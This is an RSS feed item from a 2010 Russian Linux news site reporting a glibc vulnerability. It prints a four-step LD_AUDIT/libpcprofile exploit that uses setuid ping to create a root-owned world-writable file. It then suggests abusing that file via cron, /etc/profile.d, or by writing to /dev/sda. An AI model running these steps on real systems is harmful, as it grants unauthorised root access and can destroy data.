rulinux.net - Новости - Security - Ещё одна дыра в glibc http://rulinux.net/ rulinux.net - Новости - Security - Ещё одна дыра в glibc http://rulinux.net/ http://rulinux.net/rss_icon.png Re: Ещё одна дыра в glibc https://rulinux.net/message.php?newsid=31020&page=1#70070 https://rulinux.net/message.php?newsid=31020&page=1#70070 Tue, 26 Oct 2010 06:38:22 +0400 Решето!

]]> Ещё одна дыра в glibc https://rulinux.net/message.php?newsid=31020&page=1#70069 https://rulinux.net/message.php?newsid=31020&page=1#70069 Tue, 26 Oct 2010 06:28:42 +0400 Вскоре после обнаружения предыдущей дыры (  http://www.lor-ng.org/message.php?newsid=30924 ), которая, однако, работала только на redhat-based дистрибутивах, опубликованы сведения о новой дырке в основной библиотеке большинства дистрибутивов -- glibc. На этот раз подвержены большинство дистрибутивов. Желающие узнать механизм работы могут посмотреть его по ссылке, остальным интересующим можно сразу перейти к изучению эксплоита:

  1.  umask 0
  2.  ls -l /lib/libpcprofile.so # проверяем наличие необходимой библиотеки; можно использовать и другие библиотеки
  3.  LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/world_writeable_file" ping
  4.  ls -l /world_writeable_file # проверяем наличие вновь созданного файла и права на него (должны быть 0666)
  5.  

Дальше всё зависит только от вашей фантазии. Авторы на opennet-е запихнули этот файл в список заданий cron-а. Другой вариант -- поместить его в /etc/profile.d. Выразившие особое рвение предлагают сразу писать в /dev/sda.


>>> Подробнее]]>